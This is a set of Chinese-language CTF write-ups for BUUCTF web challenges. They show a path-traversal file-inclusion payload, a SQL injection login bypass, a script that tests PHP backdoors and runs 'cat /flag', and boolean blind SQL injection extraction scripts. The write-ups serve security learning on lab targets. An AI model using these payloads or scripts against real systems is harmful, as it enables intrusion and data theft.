Warmup
提示source.php,访问/source.php查看内容
提示source.php,访问/hint.php查看内容
需要对$page(可以用get方式或者post方式进行传入)进行拼接来绕过mb_strpos()函数,其中网页对传入的$page参数进行了urldecode(),%253经过两次url,触发网页底部的include()函数从而可以利用文件包含漏洞
//mb_strpos()函数是查询一个字符串在另一个字符串中出现的位置,返回值是首次出现位置的数值
payload
?file=hint.php%253f/../../../../../ffffllllaaaagggg
payload解析:
%253f从浏览器传入会被decode为%3f,%3f被urldecode()函数解析为?那么hint.php
/../../../../../
ffffllllaaaagggg就被成功传入到后端了从而执行include(hint.php
/../../../../../
ffffllllaaaagggg
)
[极客大挑战 2019]EasySQL
随意提交一份发现是get方式请求
发现是字符型注入,而且是双引号闭合,尝试使用万能密码
构造payload
?username=1&password=1' or '1' = '
语句进入数据库后就会变成select * from table where username = '1' and password = '1' or '1'
高明的黑客
下载附件发现是一堆杂乱的php文件,并且还有好多不知道真假的一句话后门,后门参数也很复杂无法手动判断,利用脚本判断后门真假
import re
import os
import requestsfiles = os.listdir('src/')
reg = re.compile(r'\$_[GET]{3}\[\'(.+)\'\]')
for i in files:f = open('src/'+i)print('检查文件'+i)data = f.read()f.close()result = reg.findall(data)#print(i,result,"\n")url = 'http://2073ca8f-43a7-4086-b9b6-c03b0ddd39f3.node4.buuoj.cn:81/'for j in result:payload = url + i + '?' + j + '=echo 123456'#print(payload)try:res = requests.get(url=payload,timeout=5)except:print(222222222)if '123456' in res.text:print(payload)payload1=url+i+'?'+j+'=cat /flag'res1 = requests.get(url=payload1)#print(payload1)reg1 = re.compile(r'flag\{.*?\}')result_flag = reg1.findall(res1.text)print(result_flag)
输出:
http://2073ca8f-43a7-4086-b9b6-c03b0ddd39f3.node4.buuoj.cn:81/xk0SzyKwfzw.php?Efa5BVG=echo 123456
['flag{c67a8c51-f28e-4fd9-bba1-8dffe98ce4a7}']
得到flag
[CISCN2019 华北赛区 Day2 Web1]Hack World
打开容器,发现是一个sql查询,使用burpsuit测试发现过滤了大量的关键字,没有屏蔽ascii,substr还有'='
输入1,和1=1 页面返回的内容都一样,考虑使用布尔盲注,手动太慢,用脚本(穷举ascii码1-127)
import re
import requests
result = ""
url='http://762429ff-8ef9-43ef-90c7-60240da0f142.node4.buuoj.cn:81/'
for i in range(1,50):print(i)for j in range(1,128):post_data = {'id':"1=(ascii(substr((select(flag)from(flag)),%s,1))=%s)"%(i,j)}try:res = requests.post(url=url,data=post_data,timeout=1)print(post_data)if 'Hello' in res.text:result+=chr(j)print(result)breakexcept:print('404')
成功跑出来了flag,但是很慢很慢,尝试使用二分法
import re
import requests
from requests.api import post
result = ""
url='http://762429ff-8ef9-43ef-90c7-60240da0f142.node4.buuoj.cn:81/'
for i in range(1,50):print(i)low = 1high = 127while(low<=high):mid = (low+high)//2post_data = {'id':"1=(ascii(substr((select(flag)from(flag)),%s,1))>%s)"%(i,mid)}post_data1 = {'id':"1=(ascii(substr((select(flag)from(flag)),%s,1))=%s)"%(i,mid)}#print(mid)#res1 = requests.post(url=url,data=post_data1,timeout=1)try:res = requests.post(url=url,data=post_data,timeout=1)except:print('res连接报错')if 'Hello' in res.text:low=mid +1else:try:res1 = requests.post(url=url,data=post_data1,timeout=1)except:print('res1连接报错')if 'Hello' in res1.text:result +=chr(mid)print(result)breakelse:high=mid-1
输出结果一样